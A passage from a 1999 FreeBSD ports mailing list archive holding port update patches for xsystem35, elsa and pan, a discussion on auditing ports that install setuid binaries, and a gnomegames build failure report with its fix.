29 12:37:24 1999 ++++ configure Wed Dec 1 15:35:00 1999 +@@ -1282,13 +1282,13 @@ + CFLAGS="$ac_save_CFLAGS" + elif test $ac_cv_prog_cc_g = yes; then + if test "$GCC" = yes; then - CFLAGS="-g -O2" + CFLAGS="-g" else + CFLAGS="-g" + fi + else + if test "$GCC" = yes; then - CFLAGS="-O2" + CFLAGS="" + else + CFLAGS= fi - else - GCC= -@@ -3036,7 +3036,7 @@ +@@ -2104,8 +2104,8 @@ + LD="$LD" LDFLAGS="$LDFLAGS" LIBS="$LIBS" \ + LN_S="$LN_S" NM="$NM" RANLIB="$RANLIB" \ + DLLTOOL="$DLLTOOL" AS="$AS" OBJDUMP="$OBJDUMP" \ +-${CONFIG_SHELL-/bin/sh} $ac_aux_dir/ltconfig --no-reexec \ +-$libtool_flags --no-verify $ac_aux_dir/ltmain.sh $host \ ++${CONFIG_SHELL-/bin/sh} /usr/local/share/libtool/ltconfig --no-reexec \ ++$libtool_flags --no-verify --disable-ltlibs /usr/local/share/libtool/ltmain.sh $host \ + || { echo "configure: error: libtool configure failed" 1>&2; exit 1; } + + # Reload cache, that may have been modified by ltconfig +@@ -2119,7 +2119,7 @@ + + # This can be used to rebuild libtool when needed +-LIBTOOL_DEPS="$ac_aux_dir/ltconfig $ac_aux_dir/ltmain.sh" ++LIBTOOL_DEPS="/usr/local/share/libtool/ltconfig --disable-ltlibs /usr/local/share/libtool/ltmain.sh" + + # Always use our own libtool. + LIBTOOL='$(SHELL) $(top_builddir)/libtool' +@@ -3369,7 +3369,7 @@ + if test "$ac_cv_prog_gcc" = yes; then mfx_save_cflags="$CFLAGS" --CFLAGS="$CFLAGS -O2 -fschedule-insns -fschedule-insns2" -+CFLAGS="$CFLAGS -fschedule-insns -fschedule-insns2" +-CFLAGS="-O2 -fschedule-insns -fschedule-insns2" ++CFLAGS="-fschedule-insns -fschedule-insns2" echo $ac_n "checking whether ${CC-cc} suffers the -fschedule-insns bug""... $ac_c" 1>&6 - echo "configure:3042: checking whether ${CC-cc} suffers the -fschedule-insns bug" >&5 + echo "configure:3375: checking whether ${CC-cc} suffers the -fschedule-insns bug" >&5 if eval "test \"`echo '$''{'mfx_cv_prog_gcc_bug_schedule_insns'+set}'`\" = set"; then -@@ -3079,7 +3079,7 @@ +@@ -3412,7 +3412,7 @@ if test "$ac_cv_prog_gcc" = yes; then mfx_save_cflags="$CFLAGS" --CFLAGS="$CFLAGS -O2 -fstrength-reduce" -+CFLAGS="$CFLAGS -fstrength-reduce" +-CFLAGS="-O2 -fstrength-reduce" ++CFLAGS="-fstrength-reduce" echo $ac_n "checking whether ${CC-cc} suffers the -fstrength-reduce bug""... $ac_c" 1>&6 - echo "configure:3085: checking whether ${CC-cc} suffers the -fstrength-reduce bug" >&5 + echo "configure:3418: checking whether ${CC-cc} suffers the -fstrength-reduce bug" >&5 if eval "test \"`echo '$''{'mfx_cv_prog_gcc_bug_strength_reduce'+set}'`\" = set"; then -@@ -3167,7 +3167,7 @@ - - if test "$GCC" = yes; then - M_CC="GCC" -- CFLAGS_O="-O2" -+ CFLAGS_O="" +@@ -3496,7 +3496,7 @@ + if test "$enable_debug" = yes; then + CFLAGS_O="-O0" + else +- CFLAGS_O="-O2" ++ CFLAGS_O="" + fi CFLAGS_W="-Wall -Wcast-align -Wwrite-strings" case $host in - i[34567]86-*) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 14:40:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D390B14F75 for ; Wed, 1 Dec 1999 14:40:29 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA37121; Wed, 1 Dec 1999 14:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from m08.alpha-net.ne.jp (m08.alpha-net.ne.jp [210.229.64.38]) by hub.freebsd.org (Postfix) with ESMTP id DD018150E1 for ; Wed, 1 Dec 1999 14:31:50 -0800 (PST) (envelope-from k5@cheerful.com) Received: from kyoto-p14.alpha-net.ne.jp (kyoto-p14.alpha-net.ne.jp [210.237.118.14]) by m08.alpha-net.ne.jp (8.9.3/3.7W) with ESMTP id HAA20081 for ; Thu, 2 Dec 1999 07:25:20 +0900 (JST) Received: from souffle.bogus-local.net (souffle.bogus-local.net [192.168.1.1]) by kyoto-p14.alpha-net.ne.jp (Postfix) with ESMTP id B341D3DAF for ; Thu, 2 Dec 1999 07:30:48 +0900 (JST) Message-Id: <14405.41368.771850.29321F@cheerful.com> Date: Thu, 02 Dec 1999 07:30:48 +0900 From: FUJISHIMA Satsuki Reply-To: k5@cheerful.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15216: Update port: emulators/xsystem35 -> 1.2.4 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15216 >Category: ports >Synopsis: Update port: emulators/xsystem35 -> 1.2.4 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 14:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: FUJISHIMA Satsuki >Release: FreeBSD 4.0-CURRENT i386 >Organization: N/A >Environment: tested on: FreeBSD 4.0-CURRENT #148: Mon Nov 29 05:55:32 JST 1999 FreeBSD 3.3-STABLE #4: Wed Nov 24 04:08:07 JST 1999 >Description: o update to 1.2.4. o discribe about sound driver issue. This prevent me updating this port for a long time. o add esound support. o change MAINTAINER's e-mail address. >How-To-Repeat: >Fix: cd $PORTSDIR/emulators/xsystem35 && patch < THISFILE Index: Makefile =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/Makefile,v retrieving revision 1.18 diff -u -r1.18 Makefile --- Makefile 1999/08/25 05:49:54 1.18 +++ Makefile 1999/12/01 21:56:46 @@ -6,38 +6,53 @@ # $FreeBSD: ports/emulators/xsystem35/Makefile,v 1.18 1999/08/25 05:49:54 obrien Exp $ # -DISTNAME= xsystem35-1.0.7 +DISTNAME= xsystem35-1.2.4 CATEGORIES= emulators MASTER_SITES= http://www.aist-nara.ac.jp/~masaki-c/private/unitbase/xsys35/down/ -MAINTAINER= k5@respo.or.jp +MAINTAINER= k5@cheerful.com -LIB_DEPENDS+= gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 +LIB_DEPENDS= gtk12.2:${PORTSDIR}/x11-toolkits/gtk12 +.if defined(WITH_ESOUND) +LIB_DEPENDS+= esd.2:${PORTSDIR}/audio/esound +.endif + USE_IMAKE= YES WRKSRC= ${WRKDIR}/${DISTNAME}/src +PKGMESSAGE= ${WRKSRC}/MESSAGE -DOC_FILES= BUGS ChangeLog FAQ GRFMT.TXT INSTALL README README.midi \ - README.miko THANKS TODO MISCGAME.TXT -EXAMPLES= README.TXT atlach.inf dalk.inf diabo.inf drstop.inf \ - katsumi.inf kichiku.inf miko.inf ningen.inf oudou.inf \ - panyo.inf rance1.inf rance2.inf rance3.inf rance4.inf \ - toushin.inf toushin2.inf zero.inf +DOC_FILES= BUGS ChangeLog FAQ GRFMT.TXT INSTALL MISCGAME.TXT README \ + README.color README.miko README.music README.pastel THANKS \ + TODO +EXAMPLES= README.TXT ambi.inf atlach.inf dalk.inf darcrows.inf \ + diabo.inf drstop.inf hushaby.inf katsumi.inf kichiku.inf \ + mamatoto.inf mamori.inf miko.inf mugen.inf ningen.inf \ + oudou.inf panyo.inf pascha.inf progood.inf rance1.inf \ + rance2.inf rance3.inf rance4.inf toushin.inf toushin2.inf \ + zero.inf + +pre-configure: +.if defined(WITH_ESOUND) + ${MV} ${WRKSRC}/config.h ${WRKSRC}/config.h.orig + ${SED} -e 43,43d -e 45,45d ${WRKSRC}/config.h.orig > ${WRKSRC}/config.h +.endif do-install: - ${INSTALL_PROGRAM} ${WRKSRC}/xsystem35 ${PREFIX}/bin - ${INSTALL_SCRIPT} ${WRKSRC}/../contrib/instgame ${PREFIX}/bin + @${INSTALL_PROGRAM} ${WRKSRC}/xsystem35 ${PREFIX}/bin + @${INSTALL_SCRIPT} ${WRKSRC}/../contrib/instgame ${PREFIX}/bin post-install: .if !defined(NOPORTDOCS) - ${MKDIR} ${PREFIX}/share/doc/ja/xsystem35 + @${MKDIR} ${PREFIX}/share/doc/ja/xsystem35 @(cd ${WRKSRC}/../doc;\ ${INSTALL_MAN} ${DOC_FILES} ${PREFIX}/share/doc/ja/xsystem35) - ${MKDIR} ${PREFIX}/share/examples/xsystem35 - ${INSTALL_DATA} ${WRKSRC}/xsys35rc.sample ${PREFIX}/share/examples/xsystem35 + @${MKDIR} ${PREFIX}/share/examples/xsystem35 + @${INSTALL_DATA} ${WRKSRC}/xsys35rc.sample ${PREFIX}/share/examples/xsystem35 @(cd ${WRKSRC}/../contrib; \ ${INSTALL_DATA} ${EXAMPLES} ${PREFIX}/share/examples/xsystem35) + @${SED} -e s,PREFIX,${PREFIX}, ${PKGDIR}/MESSAGE > ${WRKSRC}/MESSAGE + @${CAT} ${WRKSRC}/MESSAGE .endif - ${CAT} ${PKGDIR}/MESSAGE .include Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/files/md5,v retrieving revision 1.11 diff -u -r1.11 md5 --- md5 1999/05/01 02:21:21 1.11 +++ md5 1999/11/28 20:50:26 @@ -1 +1 @@ -MD5 (xsystem35-1.0.7.tar.gz) = 7fc0160761dd59be553be1c19d9c5f66 +MD5 (xsystem35-1.2.4.tar.gz) = 8bfbba73437b735277356aeb43dc174a Index: patches/patch-af =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/patches/patch-af,v retrieving revision 1.2 diff -u -r1.2 patch-af --- patch-af 1999/04/05 16:33:48 1.2 +++ patch-af 1999/10/26 17:02:41 @@ -1,12 +1,16 @@ ---- Imakefile.orig Sat Jan 16 05:16:18 1999 -+++ Imakefile Sat Jan 23 01:21:39 1999 -@@ -114,9 +114,9 @@ +--- Imakefile Tue Aug 3 05:22:37 1999 ++++ Imakefile Wed Oct 27 02:02:13 1999 +@@ -148,13 +148,13 @@ /* * include / library / definition */ -SYS_LIBRARIES = -lm `gtk-config --libs` +SYS_LIBRARIES = -lm `gtk12-config --libs` + #ifdef ENABLE_ESD + EXTRA_LIBRARIES = $(OSDEPLIB) -lesd + #else EXTRA_LIBRARIES = $(OSDEPLIB) + #endif -EXTRA_INCLUDES = `gtk-config --cflags` $(OSDEPINC) +EXTRA_INCLUDES = `gtk12-config --cflags` $(OSDEPINC) EXTRA_DEFINES = $(OSDEPDEF) Index: pkg/DESCR =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/pkg/DESCR,v retrieving revision 1.5 diff -u -r1.5 DESCR --- DESCR 1999/02/12 15:41:02 1.5 +++ DESCR 1999/12/01 21:19:45 @@ -1,7 +1,6 @@ -Xsystem35 is AliceSoft System 3.5 emulator on X Window System +Xsystem35 is AliceSoft System 3.5 implementation on X Window System -See also /usr/X11R6/share/doc/ja/xsystem35 and -http://www.aist-nara.ac.jp/~masaki-c/private/unitbase/xsys35/index.html +WWW: http://www.aist-nara.ac.jp/~masaki-c/private/unitbase/xsys35/index.html - FUJISHIMA Satsuki -k5@respo.or.jp +k5@cheerful.com Index: pkg/MESSAGE =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/pkg/MESSAGE,v retrieving revision 1.4 diff -u -r1.4 MESSAGE --- MESSAGE 1999/01/23 18:38:32 1.4 +++ MESSAGE 1999/12/01 22:04:01 @@ -1,19 +1,17 @@ ------ -o 1st, copy /usr/X11R6/share/example/xsystem35/xsys35rc.sample - to ~/.xsys35rc and fit it to your environment. -e.g.) -cdrom_device: /dev/cd0c - -o 2nd, install game data from AliceSoft's cdrom with - /usr/X11R6/bin/instgame. - -o 3rd, install X-tt for your real pleasure(optional). - -o and, enjoy! - -********************* IMPORTANT ********************* -If you use over 16bpp mode, you must add - options SHMMAXPGS=4096 -to your kernel configuration file and rebuild kernel. -***************************************************** ------ + +o make sure your kernel has been configured with options SHMMAXPGS=4096 + when you run on display 16bpp or deeper color. + +o copy PREFIX/share/example/xsystem35/xsys35rc.sample + to ~/.xsys35rc and fit it to your environment. + +o install game data from AliceSoft's cdrom with + PREFIX/bin/instgame. + +o install X-TT for your real pleasure(optional). + +o pcm0 sound device doesn't work well with this program for now. + Try snd0 instead, OSS commercial product or + -devdsp none commandline option as the last resort. + +enjoy! Index: pkg/PLIST =================================================================== RCS file: /home/ncvs/ports/emulators/xsystem35/pkg/PLIST,v retrieving revision 1.5 diff -u -r1.5 PLIST --- PLIST 1999/02/02 16:20:38 1.5 +++ PLIST 1999/11/29 01:47:47 @@ -1,5 +1,5 @@ -bin/xsystem35 bin/instgame +bin/xsystem35 share/doc/ja/xsystem35/BUGS share/doc/ja/xsystem35/ChangeLog share/doc/ja/xsystem35/FAQ @@ -7,28 +7,38 @@ share/doc/ja/xsystem35/INSTALL share/doc/ja/xsystem35/MISCGAME.TXT share/doc/ja/xsystem35/README -share/doc/ja/xsystem35/README.midi +share/doc/ja/xsystem35/README.color share/doc/ja/xsystem35/README.miko +share/doc/ja/xsystem35/README.music +share/doc/ja/xsystem35/README.pastel share/doc/ja/xsystem35/THANKS share/doc/ja/xsystem35/TODO -share/examples/xsystem35/xsys35rc.sample share/examples/xsystem35/README.TXT +share/examples/xsystem35/ambi.inf share/examples/xsystem35/atlach.inf share/examples/xsystem35/dalk.inf +share/examples/xsystem35/darcrows.inf share/examples/xsystem35/diabo.inf share/examples/xsystem35/drstop.inf +share/examples/xsystem35/hushaby.inf share/examples/xsystem35/katsumi.inf share/examples/xsystem35/kichiku.inf +share/examples/xsystem35/mamatoto.inf +share/examples/xsystem35/mamori.inf share/examples/xsystem35/miko.inf +share/examples/xsystem35/mugen.inf share/examples/xsystem35/ningen.inf share/examples/xsystem35/oudou.inf share/examples/xsystem35/panyo.inf +share/examples/xsystem35/pascha.inf +share/examples/xsystem35/progood.inf share/examples/xsystem35/rance1.inf share/examples/xsystem35/rance2.inf share/examples/xsystem35/rance3.inf share/examples/xsystem35/rance4.inf share/examples/xsystem35/toushin.inf share/examples/xsystem35/toushin2.inf +share/examples/xsystem35/xsys35rc.sample share/examples/xsystem35/zero.inf @dirrm share/doc/ja/xsystem35 @dirrm share/examples/xsystem35 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 16:10:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A5EC14F2B for ; Wed, 1 Dec 1999 16:10:38 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA65912; Wed, 1 Dec 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 1 Dec 1999 16:10:01 -0800 (PST) Message-Id: <199912020010.QAA65912@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Chris D. Faulhaber" Subject: Re: ports/15191: Update port: net/elsa Reply-To: "Chris D. Faulhaber" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15191; it has been noted by GNATS. From: "Chris D. Faulhaber" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15191: Update port: net/elsa Date: Wed, 1 Dec 1999 19:04:15 -0500 (EST) The following patch updates elsa and, instead of marking broken for -current, stops and notifies what compat libs are required. Index: Makefile =================================================================== RCS file: /home/ncvs/ports/net/elsa/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/10 23:53:56 1.1.1.1 +++ Makefile 1999/12/02 00:01:52 @@ -1,5 +1,5 @@ # New ports collection makefile for: elsa -# Version required: 1.0 +# Version required: 1.0b-017 # Date created: 06 October 1999 # Whom: Chris D. Faulhaber # @@ -7,7 +7,7 @@ # DISTNAME= elsa-freebsd_x86 -PKGNAME= elsa-1.0b +PKGNAME= elsa-1.0b-017 CATEGORIES= net MASTER_SITES= "" @@ -16,8 +16,9 @@ ONLY_FOR_ARCHS= i386 RESTRICTED= "LIC: redistribution not allowed" -WRKSRC= ${WRKDIR}/ELSA-1_0b-016-freebsd_x86 +WRKSRC= ${WRKDIR}/ELSA-1_0b-017-freebsd_x86 NO_BUILD= yes +LOG_DIR?= /var/log/elsa .include @@ -25,14 +26,27 @@ IGNORE='The source to this port may not be automatically fetched due to licensing restrictions. You MUST fetch the source manually after registering at: http://streaming.entera.com/orderform.shtml Once ${DISTFILES} has been downloaded, move it to ${DISTDIR} and then restart this build.' .endif +pre-fetch: + @for library in libc_r.so.3 libstdc++.so.2 libg++.so.4; do \ + if [ -z "`ldconfig -r -elf | ${GREP} $$library`" ]; then \ + ${ECHO}; \ + ${ECHO} "This port requires the following FreeBSD 3.x compatibility"; \ + ${ECHO} "libraries: libc_r.so.3, libstdc++.so.2, and libg++.so.4."; \ + ${ECHO} "Please ensure they are installed and properly registered"; \ + ${ECHO} "with the system (see ldconfig(8)). These libraries may be"; \ + ${ECHO} "obtained from compat3x and/or a recent FreeBSD 3.x system."; \ + ${ECHO}; \ + exit 1; \ + fi \ + done + do-configure: - @${MV} ${WRKSRC}/elsa.cfg ${WRKSRC}/elsa.cfg.orig - @${SED} -e 's|CHANGE_ME|${PREFIX}/share/elsa|' \ - < ${WRKSRC}/elsa.cfg.orig > ${WRKSRC}/elsa.cfg + @${PERL} -pi.orig -e 's|__PREFIX__|${PREFIX}|' ${WRKSRC}/elsa.cfg + @${PERL} -pi.orig -e 's|__LOG_DIR__|${LOG_DIR}|' ${WRKSRC}/elsa.cfg do-install: ${MKDIR} ${PREFIX}/share/elsa/content - ${MKDIR} /var/log/elsa + ${MKDIR} ${LOG_DIR} ${INSTALL_SCRIPT} ${WRKSRC}/elsa ${PREFIX}/sbin ${INSTALL_DATA} ${WRKSRC}/elsa.cfg ${PREFIX}/etc ${INSTALL_DATA} ${WRKSRC}/LICENSE ${PREFIX}/share/elsa Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/net/elsa/files/md5,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 md5 --- md5 1999/11/10 23:53:56 1.1.1.1 +++ md5 1999/12/02 00:01:52 @@ -1 +1 @@ -MD5 (elsa-freebsd_x86.tar.gz) = cc53ab9100d23d81bfcfd27090524912 +MD5 (elsa-freebsd_x86.tar.gz) = 68bca29c7fc60cea46bde698933f12fa Index: patches/patch-aa =================================================================== RCS file: /home/ncvs/ports/net/elsa/patches/patch-aa,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 patch-aa --- patch-aa 1999/11/10 23:53:56 1.1.1.1 +++ patch-aa 1999/12/02 00:01:52 @@ -1,10 +1,11 @@ ---- elsa.cfg.orig Thu Sep 30 17:27:22 1999 -+++ elsa.cfg Wed Oct 6 21:48:19 1999 -@@ -1,5 +1,5 @@ +--- elsa.cfg.orig Mon Nov 29 21:42:06 1999 ++++ elsa.cfg Tue Nov 30 12:42:55 1999 +@@ -1,5 +1,6 @@ [config] -CONTENT_DIR=content -LOGGING_DIR=. -+CONTENT_DIR=CHANGE_ME/content -+LOGGING_DIR=/var/log/elsa ++CONTENT_DIR=__PREFIX__/share/elsa/content ++LOGGING_DIR=__LOG_DIR__ LOGGING=yes LOGGING_DEBUG=yes ++PID_FILE=/var/run/elsa.pid To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 16:40:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D0D2F14BF8 for ; Wed, 1 Dec 1999 16:40:16 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA71656; Wed, 1 Dec 1999 16:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 2B86D14BF8 for ; Wed, 1 Dec 1999 16:38:32 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id D5D409B36; Wed, 1 Dec 1999 19:38:05 -0500 (EST) Message-Id: <19991202003805.D5D409B36@pawn.primelocation.net> Date: Wed, 1 Dec 1999 19:38:05 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15217: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15217 >Category: ports >Synopsis: Update port: news/pan >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 1 16:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: news/pan * Update to 0.6.5 * Numerous bug fixes * remove patch-ab and patch-ac (contents integrated, no longer necessary in the port) >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/news/pan/Makefile,v retrieving revision 1.9 diff -u -r1.9 Makefile --- Makefile 1999/11/30 18:48:04 1.9 +++ Makefile 1999/12/02 00:35:18 @@ -1,12 +1,12 @@ # New ports collection makefile for: pan -# Version required: 0.6.4 +# Version required: 0.6.5 # Date created: 07 August 1999 # Whom: Chris D. Faulhaber # # $FreeBSD: ports/news/pan/Makefile,v 1.9 1999/11/30 18:48:04 cpiazza Exp $ # -DISTNAME= pan-0.6.4 +DISTNAME= pan-0.6.5 CATEGORIES= news gnome MASTER_SITES= ftp://source.rebelbase.com/pub/pan/ Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/news/pan/files/md5,v retrieving revision 1.9 diff -u -r1.9 md5 --- md5 1999/11/30 18:48:05 1.9 +++ md5 1999/12/02 00:35:18 @@ -1 +1 @@ -MD5 (pan-0.6.4.tar.bz2) = a694991bdcd97940a101290f8f66dbab +MD5 (pan-0.6.5.tar.bz2) = f8a8dc5fd842c89d6be7c3a61653458e >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 16:43:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 3427E14BF8; Wed, 1 Dec 1999 16:43:25 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 2201E1CD80D; Wed, 1 Dec 1999 16:43:25 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Wed, 1 Dec 1999 16:43:25 -0800 (PST) From: Kris Kennaway To: Brad Knowles Cc: audit@FreeBSD.ORG, asami@freebsd.org, ports@freebsd.org Subject: Re: Auditing ports In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [crossposting discussion about auditing of ports which install setuid/setgid binaries to gather input from the ports crowd..] On Thu, 2 Dec 1999, Brad Knowles wrote: > You want to do this under -CURRENT, as opposed to -STABLE, right? It won't matter much, modulo ports which build on one but not the other (see http://bento.freebsd.org). All we'd want from this exercise is a list of ports which are setuid and which need to be investigated by source. > I'd be interested to know how it would be done, and as part of > that exercise I'd be willing to try it under -STABLE (the version > currently installed on the machine I can play with at the moment). I > can't help you with doing this under -CURRENT, however. Mount your 3.3R CDROM and pkg_add everything, then do a find /usr/local -perm -2000 -o -perm -4000 -ls Then we can take that list and match it against the PLIST files in the ports tree and figure out which port installed the file. This would be a start, then we have to do it for all the ports which have changed since 3.3-R. Actually, I just thought of a better way: we (FreeBSD) already have most of the pieces in place, in the form of Satoshi's port building cluster. All we (read: he :-) has to do is to check each port as it's built to see if it installs set[gu]id stuff, and flag it if so. The resulting list will catch all cases, and will also catch previously non-suid ports which suddenly become it (or just new suid ports). Would this be an easy thing to do, Satoshi? A second step would probably be to add a SECURITY tag to the makefile of all of these ports noting the audit status (e.g. "not reviewed", "reviewed v1.0, probably okay", etc). We could then have interactive port building/pkg_add/sysinstall emit a warning about potential danger from unaudited sources, etc. But the first thing is to get a list of what might be a major security risk. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 20: 6:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from pis.toba-cmt.ac.jp (pis.toba-cmt.ac.jp [202.26.248.77]) by hub.freebsd.org (Postfix) with ESMTP id EA79414C92 for ; Wed, 1 Dec 1999 20:06:42 -0800 (PST) (envelope-from kiri@pis.toba-cmt.ac.jp) Received: from kiri.pis (localhost [127.0.0.1]) by pis.toba-cmt.ac.jp (8.9.3/8.9.3) with ESMTP id NAA96630 for ; Thu, 2 Dec 1999 13:04:45 +0900 (JST) (envelope-from kiri@pis.toba-cmt.ac.jp) Message-Id: <199912020404.NAA96630@pis.toba-cmt.ac.jp> Date: Thu, 02 Dec 1999 13:04:44 +0900 From: kiri@pis.toba-cmt.ac.jp To: FreeBSD-ports@FreeBSD.ORG Subject: games/gnomegames failed in 4.0-CURRENT! In-Reply-To: In your message of "Wed, 1 Dec 1999 13:51:29 +0300 (MSK)" <19991201105129.62FE83C0A@neva.vlink.ru> References: <19991201105129.62FE83C0A@neva.vlink.ru> User-Agent: Wanderlust/1.0.3 (Notorious) SEMI/1.13.3 (Komaiko) FLIM/1.12.5 (Hirahata) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) MIME-Version: 1.0 (generated by SEMI 1.13.3 - "Komaiko") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi,all. Yesterday,I made install x11/gnome in 4.0-CURRENT on XFree86-3.3.5,but it failed in games/gnomegames as follows: c++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/X11R6/include -DNEED_GNOMESUPPORT_H -I/usr/local/include/glib12 -I/usr/local/include -I/usr/X11R6/include/gtk12 -DGNOMELOCALDIR=\""/usr/X11R6/share/gnome/local"\" -I/usr/local/include -I/usr/X11R6/include/gtk12 -I/usr/local/include -I/usr/X11R6/include -I/usr/local/include/glib12 -O -pipe -c MCursor.cc MCursor.cc: In method `void MCursor::load(const char *, int)': MCursor.cc:12: ANSI C++ forbids implicit conversion from `void *' in argument passing MCursor.cc:21: ANSI C++ forbids implicit conversion from `void *' in argument passing gmake[3]: *** [MCursor.o] Error 1 gmake[3]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51/xbill' gmake[2]: *** [all-recursive] Error 1 gmake[2]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51/xbill' gmake[1]: *** [all-recursive] Error 1 gmake[1]: Leaving directory `/usr/ports/games/gnomegames/work/gnome-games-1.0.51' gmake: *** [all-recursive-am] Error 2 *** Error code 2 Stop in /usr/ports/games/gnomegames. *** Error code 1 Complete log of above session saved at ftp://fbsd.toba-cmt.ac.jp/incoming/gnomegames.log Is there any suggestions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 1 20:35:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from tokyonet-entrance.astec.co.jp (tokyonet-entrance.astec.co.jp [202.239.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 6B21C14C1C for ; Wed, 1 Dec 1999 20:35:29 -0800 (PST) (envelope-from nakai@internetsolutions.co.jp) Received: from amont.astec.co.jp (amont.astec.co.jp [172.20.10.1]) by tokyonet-entrance.astec.co.jp (8.9.1+3.0W/3.7W-astecMX2.3) with ESMTP id NAA15290; Thu, 2 Dec 1999 13:33:25 +0900 (JST) Received: from internetsolutions.co.jp (isg29.astec.co.jp [172.20.70.229]) by amont.astec.co.jp (8.7.6/3.6W-astecMX2.4) with ESMTP id NAA26524; Thu, 2 Dec 1999 13:33:24 +0900 (JST) Message-ID: <3845F64C.276040AD@internetsolutions.co.jp> Date: Thu, 02 Dec 1999 13:32:12 +0900 From: Yukihiro Nakai Organization: InternetSolutions, Inc. X-Mailer: Mozilla 4.5 [ja] (Win98; I) X-Accept-Language: ja MIME-Version: 1.0 To: kiri@pis.toba-cmt.ac.jp Cc: FreeBSD-ports@FreeBSD.ORG Subject: Re: games/gnomegames failed in 4.0-CURRENT! References: <19991201105129.62FE83C0A@neva.vlink.ru> <199912020404.NAA96630@pis.toba-cmt.ac.jp> Content-Type: text/plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The patch in ports/15110 is commited and now it fixed. Thank you.. Yukihiro Nakai -------------- kiri@pis.toba-cmt.ac.jp wrote: > > 